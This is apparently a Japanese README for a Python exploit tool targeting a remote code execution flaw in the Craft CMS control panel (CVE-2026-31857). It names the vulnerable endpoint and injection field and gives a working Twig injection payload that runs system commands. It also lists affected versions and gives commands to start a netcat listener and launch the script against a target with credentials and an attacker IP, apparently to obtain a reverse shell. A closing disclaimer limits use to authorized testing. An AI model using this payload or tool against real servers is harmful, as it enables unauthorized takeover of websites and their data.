
Craft CMS のコントロールパネルにおけるリレーショナル条件を介した RCE
Craft CMS 管理パネルにおける RCE 脆弱性の Python エクスプロイト。admin/actions/element-indexes/count-elements エンドポイント経由でトリガーされます。
インジェクションは RelatedToConditionRule 条件の elementIds フィールドを通じて行われ、サーバーサイドで Twig として解釈され、system フィルターを悪用して任意のコマンドを実行します ({{[['<cmd>']|filter('system')]}})。
脆弱性は NeoSprings によって公開されました。
影響を受けるバージョン :
>= 5.0.0-RC1, <= 5.9.8>= 4.0.0-beta.1, <= 4.17.3参考情報 :
$ git clone https://github.com/0xTatsuki/CVE-2026-31857.git
$ cd CVE-2026-31857
$ pip install -r requirements.txt
$ nc -lvnp <attacker_port>
$ python3 CVE-2026-31857.py -t http://<craftcms_base_url> -u <username> -p <password> -i <attacker_ip> -P <attacker_port>
このツールは教育目的および許可された演習 (CTF、契約に基づくペネトレーションテスト、またはローカルテスト) のみを目的として提供されています。 明示的な許可なくいかなるシステムに対して使用することも違法です。